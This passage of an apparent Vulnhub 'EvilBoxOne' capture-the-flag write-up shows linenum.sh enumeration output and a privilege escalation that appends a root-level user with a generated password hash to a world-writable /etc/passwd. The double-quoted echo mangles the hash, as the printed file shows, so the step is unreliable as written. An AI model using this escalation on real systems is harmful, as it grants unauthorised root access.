-rw-r--r-- 1 root root 480 feb 14 2019 final.target
-rw-r--r-- 1 root root 506 feb 14 2019 getty-pre.target
-rw-r--r-- 1 root root 500 feb 14 2019 getty.target
-rw-r--r-- 1 root root 598 feb 14 2019 graphical.target
-rw-r--r-- 1 root root 527 feb 14 2019 halt.target
-rw-r--r-- 1 root root 509 feb 14 2019 hibernate.target
-rw-r--r-- 1 root root 530 feb 14 2019 hybrid-sleep.target
-rw-r--r-- 1 root root 593 feb 14 2019 initrd-fs.target
-rw-r--r-- 1 root root 561 feb 14 2019 initrd-root-device.target
-rw-r--r-- 1 root root 566 feb 14 2019 initrd-root-fs.target
-rw-r--r-- 1 root root 777 feb 14 2019 initrd-switch-root.target
-rw-r--r-- 1 root root 763 feb 14 2019 initrd.target
-rw-r--r-- 1 root root 541 feb 14 2019 kexec.target
-rw-r--r-- 1 root root 435 feb 14 2019 local-fs-pre.target
-rw-r--r-- 1 root root 547 feb 14 2019 local-fs.target
-rw-r--r-- 1 root root 445 feb 14 2019 machine.slice
-rw-r--r-- 1 root root 532 feb 14 2019 multi-user.target
-rw-r--r-- 1 root root 505 feb 14 2019 network-online.target
-rw-r--r-- 1 root root 502 feb 14 2019 network-pre.target
-rw-r--r-- 1 root root 521 feb 14 2019 network.target
-rw-r--r-- 1 root root 554 feb 14 2019 nss-lookup.target
-rw-r--r-- 1 root root 513 feb 14 2019 nss-user-lookup.target
-rw-r--r-- 1 root root 394 feb 14 2019 paths.target
-rw-r--r-- 1 root root 592 feb 14 2019 poweroff.target
-rw-r--r-- 1 root root 417 feb 14 2019 printer.target
-rw-r--r-- 1 root root 745 feb 14 2019 proc-sys-fs-binfmt_misc.automount
-rw-r--r-- 1 root root 655 feb 14 2019 proc-sys-fs-binfmt_misc.mount
-rw-r--r-- 1 root root 583 feb 14 2019 reboot.target
-rw-r--r-- 1 root root 549 feb 14 2019 remote-cryptsetup.target
-rw-r--r-- 1 root root 436 feb 14 2019 remote-fs-pre.target
-rw-r--r-- 1 root root 522 feb 14 2019 remote-fs.target
-rw-r--r-- 1 root root 492 feb 14 2019 rescue.target
-rw-r--r-- 1 root root 540 feb 14 2019 rpcbind.target
-rw-r--r-- 1 root root 442 feb 14 2019 shutdown.target
-rw-r--r-- 1 root root 402 feb 14 2019 sigpwr.target
-rw-r--r-- 1 root root 460 feb 14 2019 sleep.target
-rw-r--r-- 1 root root 449 feb 14 2019 slices.target
-rw-r--r-- 1 root root 420 feb 14 2019 smartcard.target
-rw-r--r-- 1 root root 396 feb 14 2019 sockets.target
-rw-r--r-- 1 root root 420 feb 14 2019 sound.target
-rw-r--r-- 1 root root 503 feb 14 2019 suspend.target
-rw-r--r-- 1 root root 577 feb 14 2019 suspend-then-hibernate.target
-rw-r--r-- 1 root root 393 feb 14 2019 swap.target
-rw-r--r-- 1 root root 795 feb 14 2019 sys-fs-fuse-connections.mount
-rw-r--r-- 1 root root 558 feb 14 2019 sysinit.target
-rw-r--r-- 1 root root 767 feb 14 2019 sys-kernel-config.mount
-rw-r--r-- 1 root root 710 feb 14 2019 sys-kernel-debug.mount
-rw-r--r-- 1 root root 1,4K feb 14 2019 syslog.socket
-rw-r--r-- 1 root root 722 feb 14 2019 systemd-ask-password-console.path
-rw-r--r-- 1 root root 650 feb 14 2019 systemd-ask-password-wall.path
-rw-r--r-- 1 root root 556 feb 14 2019 systemd-exit.service
-rw-r--r-- 1 root root 546 feb 14 2019 systemd-initctl.socket
-rw-r--r-- 1 root root 647 feb 14 2019 systemd-journald-audit.socket
-rw-r--r-- 1 root root 1,2K feb 14 2019 systemd-journald-dev-log.socket
-rw-r--r-- 1 root root 882 feb 14 2019 systemd-journald.socket
-rw-r--r-- 1 root root 631 feb 14 2019 systemd-networkd.socket
-rw-r--r-- 1 root root 556 feb 14 2019 systemd-poweroff.service
-rw-r--r-- 1 root root 551 feb 14 2019 systemd-reboot.service
-rw-r--r-- 1 root root 726 feb 14 2019 systemd-rfkill.socket
-rw-r--r-- 1 root root 490 feb 14 2019 systemd-tmpfiles-clean.timer
-rw-r--r-- 1 root root 635 feb 14 2019 systemd-udevd-control.socket
-rw-r--r-- 1 root root 610 feb 14 2019 systemd-udevd-kernel.socket
-rw-r--r-- 1 root root 1,4K feb 14 2019 system-update-cleanup.service
-rw-r--r-- 1 root root 543 feb 14 2019 system-update-pre.target
-rw-r--r-- 1 root root 617 feb 14 2019 system-update.target
-rw-r--r-- 1 root root 445 feb 14 2019 timers.target
-rw-r--r-- 1 root root 435 feb 14 2019 time-sync.target
-rw-r--r-- 1 root root 457 feb 14 2019 umount.target
-rw-r--r-- 1 root root 432 feb 14 2019 user.slice
-rw-r--r-- 1 root root 482 feb 10 2019 man-db.service
-rw-r--r-- 1 root root 164 feb 10 2019 man-db.timer
-rw-r--r-- 1 root root 151 ene 10 2019 fstrim.service
-rw-r--r-- 1 root root 170 ene 10 2019 fstrim.timer
-rw-r--r-- 1 root root 155 dic 17 2018 phpsessionclean.service
-rw-r--r-- 1 root root 144 dic 17 2018 phpsessionclean.timer
-rw-r--r-- 1 root root 695 ago 29 2018 logrotate.service
-rw-r--r-- 1 root root 442 ago 25 2018 ifupdown-pre.service
-rw-r--r-- 1 root root 279 ago 25 2018 ifupdown-wait-online.service
-rw-r--r-- 1 root root 552 ago 25 2018 [email protected]
-rw-r--r-- 1 root root 643 ago 25 2018 networking.service
-rw-r--r-- 1 root root 192 ene 4 2018 logrotate.timer
-rw-r--r-- 1 root root 312 oct 10 2016 console-setup.service
-rw-r--r-- 1 root root 287 oct 10 2016 keyboard-setup.service
/lib/systemd/system/multi-user.target.wants:
total 0
lrwxrwxrwx 1 root root 15 jul 8 2021 getty.target -> ../getty.target
lrwxrwxrwx 1 root root 33 jul 8 2021 systemd-ask-password-wall.path -> ../systemd-ask-password-wall.path
lrwxrwxrwx 1 root root 25 jul 8 2021 systemd-logind.service -> ../systemd-logind.service
lrwxrwxrwx 1 root root 39 jul 8 2021 systemd-update-utmp-runlevel.service -> ../systemd-update-utmp-runlevel.service
lrwxrwxrwx 1 root root 32 jul 8 2021 systemd-user-sessions.service -> ../systemd-user-sessions.service
lrwxrwxrwx 1 root root 15 jul 5 2020 dbus.service -> ../dbus.service
/lib/systemd/system/sockets.target.wants:
total 0
lrwxrwxrwx 1 root root 25 jul 8 2021 systemd-initctl.socket -> ../systemd-initctl.socket
lrwxrwxrwx 1 root root 32 jul 8 2021 systemd-journald-audit.socket -> ../systemd-journald-audit.socket
lrwxrwxrwx 1 root root 34 jul 8 2021 systemd-journald-dev-log.socket -> ../systemd-journald-dev-log.socket
lrwxrwxrwx 1 root root 26 jul 8 2021 systemd-journald.socket -> ../systemd-journald.socket
lrwxrwxrwx 1 root root 31 jul 8 2021 systemd-udevd-control.socket -> ../systemd-udevd-control.socket
lrwxrwxrwx 1 root root 30 jul 8 2021 systemd-udevd-kernel.socket -> ../systemd-udevd-kernel.socket
lrwxrwxrwx 1 root root 14 jul 5 2020 dbus.socket -> ../dbus.socket
/lib/systemd/system/sysinit.target.wants:
total 0
lrwxrwxrwx 1 root root 20 jul 8 2021 cryptsetup.target -> ../cryptsetup.target
lrwxrwxrwx 1 root root 22 jul 8 2021 dev-hugepages.mount -> ../dev-hugepages.mount
lrwxrwxrwx 1 root root 19 jul 8 2021 dev-mqueue.mount -> ../dev-mqueue.mount
lrwxrwxrwx 1 root root 28 jul 8 2021 kmod-static-nodes.service -> ../kmod-static-nodes.service
lrwxrwxrwx 1 root root 36 jul 8 2021 proc-sys-fs-binfmt_misc.automount -> ../proc-sys-fs-binfmt_misc.automount
lrwxrwxrwx 1 root root 32 jul 8 2021 sys-fs-fuse-connections.mount -> ../sys-fs-fuse-connections.mount
lrwxrwxrwx 1 root root 26 jul 8 2021 sys-kernel-config.mount -> ../sys-kernel-config.mount
lrwxrwxrwx 1 root root 25 jul 8 2021 sys-kernel-debug.mount -> ../sys-kernel-debug.mount
lrwxrwxrwx 1 root root 36 jul 8 2021 systemd-ask-password-console.path -> ../systemd-ask-password-console.path
lrwxrwxrwx 1 root root 25 jul 8 2021 systemd-binfmt.service -> ../systemd-binfmt.service
lrwxrwxrwx 1 root root 30 jul 8 2021 systemd-hwdb-update.service -> ../systemd-hwdb-update.service
lrwxrwxrwx 1 root root 27 jul 8 2021 systemd-journald.service -> ../systemd-journald.service
lrwxrwxrwx 1 root root 32 jul 8 2021 systemd-journal-flush.service -> ../systemd-journal-flush.service
lrwxrwxrwx 1 root root 36 jul 8 2021 systemd-machine-id-commit.service -> ../systemd-machine-id-commit.service
lrwxrwxrwx 1 root root 31 jul 8 2021 systemd-modules-load.service -> ../systemd-modules-load.service
lrwxrwxrwx 1 root root 30 jul 8 2021 systemd-random-seed.service -> ../systemd-random-seed.service
lrwxrwxrwx 1 root root 25 jul 8 2021 systemd-sysctl.service -> ../systemd-sysctl.service
lrwxrwxrwx 1 root root 27 jul 8 2021 systemd-sysusers.service -> ../systemd-sysusers.service
lrwxrwxrwx 1 root root 37 jul 8 2021 systemd-tmpfiles-setup-dev.service -> ../systemd-tmpfiles-setup-dev.service
lrwxrwxrwx 1 root root 33 jul 8 2021 systemd-tmpfiles-setup.service -> ../systemd-tmpfiles-setup.service
lrwxrwxrwx 1 root root 24 jul 8 2021 systemd-udevd.service -> ../systemd-udevd.service
lrwxrwxrwx 1 root root 31 jul 8 2021 systemd-udev-trigger.service -> ../systemd-udev-trigger.service
lrwxrwxrwx 1 root root 30 jul 8 2021 systemd-update-utmp.service -> ../systemd-update-utmp.service
/lib/systemd/system/getty.target.wants:
total 0
lrwxrwxrwx 1 root root 23 jul 8 2021 getty-static.service -> ../getty-static.service
/lib/systemd/system/graphical.target.wants:
total 0
lrwxrwxrwx 1 root root 39 jul 8 2021 systemd-update-utmp-runlevel.service -> ../systemd-update-utmp-runlevel.service
/lib/systemd/system/local-fs.target.wants:
total 0
lrwxrwxrwx 1 root root 29 jul 8 2021 systemd-remount-fs.service -> ../systemd-remount-fs.service
/lib/systemd/system/rescue.target.wants:
total 0
lrwxrwxrwx 1 root root 39 jul 8 2021 systemd-update-utmp-runlevel.service -> ../systemd-update-utmp-runlevel.service
/lib/systemd/system/timers.target.wants:
total 0
lrwxrwxrwx 1 root root 31 jul 8 2021 systemd-tmpfiles-clean.timer -> ../systemd-tmpfiles-clean.timer
/lib/systemd/system/systemd-timesyncd.service.d:
total 4,0K
-rw-r--r-- 1 root root 251 jul 8 2021 disable-with-time-daemon.conf
/lib/systemd/system/user-.slice.d:
total 4,0K
-rw-r--r-- 1 root root 486 feb 14 2019 10-defaults.conf
/lib/systemd/system/rc-local.service.d:
total 4,0K
-rw-r--r-- 1 root root 290 jul 8 2021 debian.conf
/lib/systemd/system/systemd-resolved.service.d:
total 4,0K
-rw-r--r-- 1 root root 551 jul 8 2021 resolvconf.conf
/lib/systemd/system/runlevel1.target.wants:
total 0
/lib/systemd/system/runlevel2.target.wants:
total 0
/lib/systemd/system/runlevel3.target.wants:
total 0
/lib/systemd/system/runlevel4.target.wants:
total 0
/lib/systemd/system/runlevel5.target.wants:
total 0
/lib/systemd/user:
total 76K
drwxr-xr-x 2 root root 4,0K ago 16 2021 graphical-session-pre.target.wants
-rw-r--r-- 1 root root 546 jul 8 2021 graphical-session-pre.target
-rw-r--r-- 1 root root 657 jul 8 2021 systemd-tmpfiles-clean.service
-rw-r--r-- 1 root root 720 jul 8 2021 systemd-tmpfiles-setup.service
-rw-r--r-- 1 root root 287 ene 31 2020 ssh-agent.service
-rw-r--r-- 1 root root 497 feb 14 2019 basic.target
-rw-r--r-- 1 root root 419 feb 14 2019 bluetooth.target
-rw-r--r-- 1 root root 454 feb 14 2019 default.target
-rw-r--r-- 1 root root 502 feb 14 2019 exit.target
-rw-r--r-- 1 root root 484 feb 14 2019 graphical-session.target
-rw-r--r-- 1 root root 394 feb 14 2019 paths.target
-rw-r--r-- 1 root root 417 feb 14 2019 printer.target
-rw-r--r-- 1 root root 442 feb 14 2019 shutdown.target
-rw-r--r-- 1 root root 420 feb 14 2019 smartcard.target
-rw-r--r-- 1 root root 396 feb 14 2019 sockets.target
-rw-r--r-- 1 root root 420 feb 14 2019 sound.target
-rw-r--r-- 1 root root 500 feb 14 2019 systemd-exit.service
-rw-r--r-- 1 root root 533 feb 14 2019 systemd-tmpfiles-clean.timer
-rw-r--r-- 1 root root 445 feb 14 2019 timers.target
/lib/systemd/user/graphical-session-pre.target.wants:
total 0
lrwxrwxrwx 1 root root 20 ene 31 2020 ssh-agent.service -> ../ssh-agent.service
/lib/systemd/system-sleep:
total 4,0K
-rwxr-xr-x 1 root root 92 oct 26 2018 hdparm
/lib/systemd/network:
total 16K
-rw-r--r-- 1 root root 645 feb 14 2019 80-container-host0.network
-rw-r--r-- 1 root root 718 feb 14 2019 80-container-ve.network
-rw-r--r-- 1 root root 704 feb 14 2019 80-container-vz.network
-rw-r--r-- 1 root root 417 feb 14 2019 99-default.link
/lib/systemd/catalog:
total 156K
-rw-r--r-- 1 root root 13K jul 8 2021 systemd.be.catalog
-rw-r--r-- 1 root root 9,8K jul 8 2021 [email protected]
-rw-r--r-- 1 root root 14K jul 8 2021 systemd.bg.catalog
-rw-r--r-- 1 root root 14K jul 8 2021 systemd.catalog
-rw-r--r-- 1 root root 472 jul 8 2021 systemd.de.catalog
-rw-r--r-- 1 root root 13K jul 8 2021 systemd.fr.catalog
-rw-r--r-- 1 root root 11K jul 8 2021 systemd.it.catalog
-rw-r--r-- 1 root root 14K jul 8 2021 systemd.pl.catalog
-rw-r--r-- 1 root root 8,2K jul 8 2021 systemd.pt_BR.catalog
-rw-r--r-- 1 root root 20K jul 8 2021 systemd.ru.catalog
-rw-r--r-- 1 root root 7,2K jul 8 2021 systemd.zh_CN.catalog
-rw-r--r-- 1 root root 7,1K jul 8 2021 systemd.zh_TW.catalog
/lib/systemd/system-generators:
total 268K
-rwxr-xr-x 1 root root 14K jul 8 2021 systemd-bless-boot-generator
-rwxr-xr-x 1 root root 31K jul 8 2021 systemd-cryptsetup-generator
-rwxr-xr-x 1 root root 15K jul 8 2021 systemd-debug-generator
-rwxr-xr-x 1 root root 39K jul 8 2021 systemd-fstab-generator
-rwxr-xr-x 1 root root 14K jul 8 2021 systemd-getty-generator
-rwxr-xr-x 1 root root 30K jul 8 2021 systemd-gpt-auto-generator
-rwxr-xr-x 1 root root 15K jul 8 2021 systemd-hibernate-resume-generator
-rwxr-xr-x 1 root root 14K jul 8 2021 systemd-rc-local-generator
-rwxr-xr-x 1 root root 15K jul 8 2021 systemd-run-generator
-rwxr-xr-x 1 root root 14K jul 8 2021 systemd-system-update-generator
-rwxr-xr-x 1 root root 35K jul 8 2021 systemd-sysv-generator
-rwxr-xr-x 1 root root 15K jul 8 2021 systemd-veritysetup-generator
/lib/systemd/system-preset:
total 4,0K
-rw-r--r-- 1 root root 951 feb 14 2019 90-systemd.preset
/lib/systemd/user-environment-generators:
total 16K
-rwxr-xr-x 1 root root 14K jul 8 2021 30-systemd-environment-d-generator
/lib/systemd/user-preset:
total 4,0K
-rw-r--r-- 1 root root 513 feb 14 2019 90-systemd.preset
/lib/systemd/boot:
total 4,0K
drwxr-xr-x 2 root root 4,0K ago 16 2021 efi
/lib/systemd/boot/efi:
total 152K
-rwxr-xr-x 1 root root 59K jul 8 2021 linuxx64.efi.stub
-rwxr-xr-x 1 root root 90K jul 8 2021 systemd-bootx64.efi
/lib/systemd/system-shutdown:
total 0
/lib/systemd/user-generators:
total 0
### SOFTWARE #############################################
[-] Apache user configuration:
APACHE_RUN_USER=www-data
APACHE_RUN_GROUP=www-data
### INTERESTING FILES ####################################
[-] Useful file locations:
/usr/bin/nc
/usr/bin/netcat
/usr/bin/wget
[-] Can we read/write sensitive files:
-rw-rw-rw- 1 root root 1398 ago 16 2021 /etc/passwd
-rw-r--r-- 1 root root 732 ago 16 2021 /etc/group
-rw-r--r-- 1 root root 767 mar 4 2016 /etc/profile
-rw-r----- 1 root shadow 941 ago 16 2021 /etc/shadow
[-] SUID files:
-rwsr-xr-x 1 root root 436552 ene 31 2020 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 10232 mar 28 2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-- 1 root messagebus 51184 jul 5 2020 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 51280 ene 10 2019 /usr/bin/mount
-rwsr-xr-x 1 root root 44440 jul 27 2018 /usr/bin/newgrp
-rwsr-xr-x 1 root root 63736 jul 27 2018 /usr/bin/passwd
-rwsr-xr-x 1 root root 34888 ene 10 2019 /usr/bin/umount
-rwsr-xr-x 1 root root 54096 jul 27 2018 /usr/bin/chfn
-rwsr-xr-x 1 root root 44528 jul 27 2018 /usr/bin/chsh
-rwsr-xr-x 1 root root 84016 jul 27 2018 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 63568 ene 10 2019 /usr/bin/su
[-] SGID files:
-rwxr-sr-x 1 root shadow 39616 feb 14 2019 /usr/sbin/unix_chkpwd
-rwxr-sr-x 1 root tty 14736 may 4 2018 /usr/bin/bsd-write
-rwxr-sr-x 1 root mail 18944 dic 3 2017 /usr/bin/dotlockfile
-rwxr-sr-x 1 root shadow 71816 jul 27 2018 /usr/bin/chage
-rwxr-sr-x 1 root shadow 31000 jul 27 2018 /usr/bin/expiry
-rwxr-sr-x 1 root tty 34896 ene 10 2019 /usr/bin/wall
-rwxr-sr-x 1 root crontab 43568 oct 11 2019 /usr/bin/crontab
-rwxr-sr-x 1 root ssh 321672 ene 31 2020 /usr/bin/ssh-agent
[+] Files with POSIX capabilities set:
/usr/bin/ping = cap_net_raw+ep
[-] Can't search *.conf files as no keyword was entered
[-] Can't search *.php files as no keyword was entered
[-] Can't search *.log files as no keyword was entered
[-] Can't search *.ini files as no keyword was entered
[-] All *.conf files in /etc (recursive 1 level):
-rw-r--r-- 1 root root 435 ago 22 2018 /etc/logrotate.conf
-rw-r--r-- 1 root root 494 feb 10 2019 /etc/nsswitch.conf
-rw-r--r-- 1 root root 2981 ago 16 2021 /etc/adduser.conf
-rw-r--r-- 1 root root 5060 oct 26 2018 /etc/hdparm.conf
-rw-r--r-- 1 root root 812 ene 10 2020 /etc/mke2fs.conf
-rw-r--r-- 1 root root 642 mar 1 2019 /etc/xattr.conf
-rw-r--r-- 1 root root 191 abr 25 2019 /etc/libaudit.conf
-rw-r--r-- 1 root root 144 ago 16 2021 /etc/kernel-img.conf
-rw-r--r-- 1 root root 2351 may 31 2018 /etc/sysctl.conf
-rw-r--r-- 1 root root 2584 ago 1 2018 /etc/gai.conf
-rw-r--r-- 1 root root 3267 ago 29 2019 /etc/reportbug.conf
-rw-r--r-- 1 root root 47 ago 16 2021 /etc/resolv.conf
-rw-r--r-- 1 root root 2969 feb 26 2019 /etc/debconf.conf
-rw-r--r-- 1 root root 9 ago 7 2006 /etc/host.conf
-rw-r--r-- 1 root root 1988 feb 26 2019 /etc/rsyslog.conf
-rw-r--r-- 1 root root 5989 ago 16 2021 /etc/ca-certificates.conf
-rw-r--r-- 1 root root 34 mar 2 2018 /etc/ld.so.conf
-rw-r--r-- 1 root root 604 jun 26 2016 /etc/deluser.conf
-rw-r--r-- 1 root root 346 ene 14 2018 /etc/discover-modprobe.conf
-rw-r--r-- 1 root root 552 feb 14 2019 /etc/pam.conf
-rw-r--r-- 1 root root 1260 dic 14 2018 /etc/ucf.conf
[-] Current user's history files:
lrwxrwxrwx 1 root root 9 ago 16 2021 /home/mowree/.bash_history -> /dev/null
[-] Location and contents (if accessible) of .bash_history file(s):
/home/mowree/.bash_history
[-] Any interesting mail in /var/mail:
total 8
drwxrwsr-x 2 root mail 4096 ago 16 2021 .
drwxr-xr-x 12 root root 4096 ago 16 2021 ..
### SCAN COMPLETE ####################################
mowree@EvilBoxOne:/tmp$
仔细查看linenum.sh的运行结果发现:
[-] Can we read/write sensitive files:
-rw-rw-rw- 1 root root 1398 ago 16 2021 /etc/passwd
所有用户都有读写权限,那就创建一个个用户并给一个密码,赋予root权限,然后将其添加到/etc/passwd文件中
─(kali㉿kali)-[~/Vulnhub/evilbox]
└─$ mkpasswd -m sha-512
Password:
$6$LPAS6IP4CD0PA46A$uWJHMTvO4hEzT3rR8MgtV664Kz/1qrsWE8Bw/jE0CRdwhzKbob3kCoZKs5E1ckI4XWYHIWHVFsT2b6.XR4Mbw/
mowree@EvilBoxOne:/tmp$ echo "kali:$6$LPAS6IP4CD0PA46A$uWJHMTvO4hEzT3rR8MgtV664Kz/1qrsWE8Bw/jE0CRdwhzKbob3kCoZKs5E1ckI4XWYHIWHVFsT2b6.XR4Mbw/:0:0:root,,,:/root:/bin/bash" >> /etc/passwd
mowree@EvilBoxOne:/tmp$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
mowree:x:1000:1000:mowree,,,:/home/mowree:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
kali:/1qrsWE8Bw/jE0CRdwhzKbob3kCoZKs5E1ckI4XWYHIWHVFsT2b6.XR4Mbw/:0:0:root,,,:/root:/bin/bash
mowree@EvilBoxOne:/tmp$